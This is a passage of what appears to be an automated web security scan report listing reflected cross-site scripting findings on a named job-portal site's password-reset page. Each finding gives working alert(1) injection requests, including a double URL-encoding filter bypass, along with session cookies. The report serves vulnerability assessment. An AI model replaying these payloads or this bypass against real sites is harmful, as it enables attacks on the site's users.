Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMID_prev" value="47,1098f22"style="x:expression(alert(1))"386752025378121a2" />
...[SNIP]...

3.140. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formid parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7db83"><a>0b5858b10bb was submitted in the formid parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript, but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&formid=107db83"><a>0b5858b10bb&rand=662813&choice=1 HTTP/1.1
Host: www.vermontjoblink.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:19:22 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<a href="/ada/mn_forgotpass.cfm?securitysys=on&amp;formid=107db83"><a>0b5858b10bb&amp;rand=805514&amp;choice=2">
...[SNIP]...

3.141. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [formname parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the formname request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178 was submitted in the formname parameter. This input was echoed as 799ac"style="x:expression(alert(1))"4abc07c70f3b31178 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated expression() inside a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer and may not work in other browsers.

The original request used the POST method; however, it was possible to convert the request to the GET method, which makes the attack easier to demonstrate and deliver.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=2&usvuserid_adadefault_error=&securitysys=on&formname_error=Form0&choice_error=2&cftextboxextradonotuse=&errorfields=usvuserid&cftextboxextradonotuse_error=&formname=Form0799ac"style%3d"x%3aexpression(alert(1))"4abc07c70f3b31178&usvuserid_error=&choice=2&submit_error=Continue&bltextboxextradonotuse1_error=&u_name_error=yes&bltextboxextradonotuse1=&formid=10&old_choice=2&rand=1902&old_choice_error=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A38%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=14&rand=662813
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:09:24 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="FORMNAME_prev" value="Form0799ac"style="x:expression(alert(1))"4abc07c70f3b31178,Form0" />
...[SNIP]...

3.142. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the library_errormessage request parameter is copied into the HTML document as plain text between tags. The payload fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1 was submitted in the library_errormessage parameter. This input was echoed as fa763<script>alert(1)</script>0885d9cb6b2590cc1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520fa763%253cscript%253ealert%25281%2529%253c%252fscript%253e0885d9cb6b2590cc1&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:52 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
</li> fa763<script>alert(1)</script>0885d9cb6b2590cc1 </ul>
...[SNIP]...

3.143. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [library_errormessage parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the library_errormessage request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270 was submitted in the library_errormessage parameter. This input was echoed as 8ccda"style="x:expression(alert(1))"396e9a22eeb45e270 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%25208ccda"style%3d"x%3aexpression(alert(1))"396e9a22eeb45e270&old_choice=2&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:50 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="LIBRARY_ERRORMESSAGE_prev" value="%20%3Cli%3EPlease%20fill%20out%20the%20username%20field%2E%3C%2Fli%3E%3C%2Fli%3E%208ccda"style="x:expression(alert(1))"396e9a22eeb45e270" />
...[SNIP]...

3.144. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8b86e"style%3d"x%3aexpression(alert(1))"aca403b3b was submitted in the old_choice parameter. This input was echoed as 8b86e"style="x:expression(alert(1))"aca403b3b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

POST /ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Content-Length: 283

usvuserid=&usvuserid_ADAdefault=&usvuserid_req=Please+fill+out+the+username+field.&usvuserid_verify_char%5B0%7C20%5D=The+value+you+have+supplied+for+Username+is+too+long.&submit=Continue&old_choice=28b86e"style%3d"x%3aexpression(alert(1))"aca403b3b&U_name=yes&choice=2&cftextboxextradonotuse=&bltextboxextradonotuse1=&FormName=Form0

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:29 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Pragma: no-cache
Expires: {ts '2011-04-29 17:08:29'}
Content-Type: text/html; charset=UTF-8
cache-control: no-cache, no-store, must-revalidate

<table border="0" cellpadding="0" cellspacing="0" summary=""><tr><td><script language="javascript">var submitted = 0;function validate(){if (!submitted){submitted = 1;return true;}else{
...[SNIP]...
<input type="hidden" name="old_choice_error" value="28b86e"style="x:expression(alert(1))"aca403b3b" class="cfTransparent" />
...[SNIP]...

3.145. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [old_choice parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the old_choice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167 was submitted in the old_choice parameter. This input was echoed as 67674"style="x:expression(alert(1))"47dcb2bfae6b18167 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /ada/mn_forgotpass.cfm?securitysys=on&FormID=10&rand=1902&library_errormessage=%2520%253Cli%253EPlease%2520fill%2520out%2520the%2520username%2520field%252E%253C%252Fli%253E%253C%252Fli%253E%2520&old_choice=267674"style%3d"x%3aexpression(alert(1))"47dcb2bfae6b18167&bltextboxextradonotuse1_error=&u_name_error=yes&cftextboxextradonotuse_error=&usvuserid_adadefault_error=&old_choice_error=2&usvuserid_error=&submit_error=Continue&CHOICE=2&formname_error=Form0&choice_error=2&ERRORFIELDS=usvuserid&cftextboxextradonotuse=&bltextboxextradonotuse1=&doubleinsert_ts=%7Bts+%272011-04-29+17%3A07%3A32%27%7D&FormName=Form0 HTTP/1.1
Host: www.vermontjoblink.com
Connection: keep-alive
Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&FormID=4&rand=493269
Cache-Control: max-age=0
Origin: https://www.vermontjoblink.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 29 Apr 2011 21:08:55 GMT
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0))
Set-Cookie: CFID=4223843;path=/
Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Content-Type: text/html; charset=UTF-8

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la
...[SNIP]...
<input type="hidden" name="OLD_CHOICE_prev" value="267674"style="x:expression(alert(1))"47dcb2bfae6b18167" />
...[SNIP]...

3.146. https://www.vermontjoblink.com/ada/mn_forgotpass.cfm [rand parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.vermontjoblink.com
Path:   /ada/mn_forgotpass.cfm

Issue detail

The value of the rand request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49ec8"style%3d"x%3aexpression(alert(1))"4a6109f7622c7b188 was submitted in the rand parameter. This input was echoed as 49ec8"style="x:expression(alert(1))"4a6109f7622c7b188 in the application's response.

